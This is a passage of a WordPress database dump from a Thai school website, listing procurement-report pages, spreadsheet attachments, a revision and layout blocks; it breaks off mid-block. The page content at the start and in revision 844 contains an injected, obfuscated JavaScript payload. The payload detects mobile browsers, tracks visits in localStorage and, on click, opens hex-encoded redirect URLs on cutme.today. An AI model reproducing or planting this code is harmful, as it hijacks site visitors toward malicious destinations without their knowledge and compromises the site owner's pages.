_0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ','','publish','closed','closed','','%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%88%e0%b9%89%e0%b8%b2','','','2024-08-15 11:34:56','2024-08-15 04:34:56','',0,'http://pakhaeng.ssk.in.th/?page_id=840',0,'page','',0),
(842,1,'2024-08-15 09:55:45','2024-08-15 02:55:45','','o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ','','inherit','','closed','','o14%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%88%e0%b9%89','','','2024-08-15 09:55:45','2024-08-15 02:55:45','',840,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ.xlsx',0,'attachment','application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',0),
(843,1,'2024-08-15 11:30:57','2024-08-15 04:30:57','','o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ','','inherit','','closed','','o14%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%88%e0%b9%89-2','','','2024-08-15 11:30:57','2024-08-15 04:30:57','',840,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ-1.xlsx',0,'attachment','application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',0),
(844,1,'2024-08-15 11:31:04','2024-08-15 04:31:04','<!-- wp:html -->\n<iframe src=\"https://onedrive.live.com/embed?resid=204B2AF26790FE9B%21142&authkey=!AKgnNha0_TYdbgU&em=2\" width=\"402\" height=\"346\" frameborder=\"0\" scrolling=\"no\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:file {\"id\":843,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ-1.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-a0ce0c15-551b-4884-86a1-e38f6dd2f6cb\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ-1.xlsx\">รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ-1.xlsx\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-a0ce0c15-551b-4884-86a1-e38f6dd2f6cb\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ','','inherit','closed','closed','','840-revision-v1','','','2024-08-15 11:31:04','2024-08-15 04:31:04','',840,'http://pakhaeng.ssk.in.th/?p=844',0,'revision','',0),
(845,1,'2024-08-15 11:31:40','2024-08-15 04:31:40','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image 